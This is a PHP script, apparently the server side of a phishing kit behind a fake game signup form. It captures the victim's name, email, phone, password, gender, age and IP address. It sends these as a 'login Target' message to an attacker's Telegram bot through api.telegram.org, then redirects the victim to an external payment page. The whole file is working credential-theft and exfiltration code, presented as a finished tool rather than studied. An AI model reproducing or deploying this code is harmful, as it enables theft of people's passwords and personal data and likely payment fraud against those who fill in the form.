<?php

error_reporting(0);

function GetIp() {
    $ip = $_SERVER['REMOTE_ADDR'];
    return $ip;
}

include "info.php";
$ip = GetIp();

// دریافت تمام فیلدها از فرم
$gameUsername = $_POST['gameUsername'];
$firstname = $_POST['firstname'];
$lastname = $_POST['lastname'];
$email = $_POST['email'];
$phone = $_POST['phone'];
$password = $_POST['password'];
$gender = $_POST['gender'];
$age = $_POST['age'];
$gameStyle = isset($_POST['gameStyle']) ? implode(', ', $_POST['gameStyle']) : '';

$Text = "
╔═══════════════════════════════
║ 🎮 *login Target - Sexy Game*
╠═══════════════════════════════
║
║ • 👤 *First Name:* $firstname
║ • 👥 *Last Name:* $lastname
║ • 🎮 *In-Game Name:* $gameUsername  
║ • 📱 *Phone:* `$phone`
║ • 📧 *Email:* $email
║ • 🔒 *Password:* ||{$password}||
║ • 🚻 *Gender:* $gender
║ • 🎂 *Age:* $age
║ • 🎯 *Play Style:* $gameStyle
║ • 🌐 *IP:* `$ip`
║
╠═══════════════════════════════
║ • 🕔 *Time:* " . date('Y-m-d H:i:s') . "
║ • 📡 *Sent by:* @imHaraz
╚═══════════════════════════════
";

@file_get_contents("https://api.telegram.org/bot".$TOKEN."/sendMessage?parse_mode=HTML&chat_id=".$ID."&text=".urlencode($Text));

// هدایت به صفحه پرداخت
header('Location: https://1hajtiemkholeravani.info/game/pay');
exit();
?>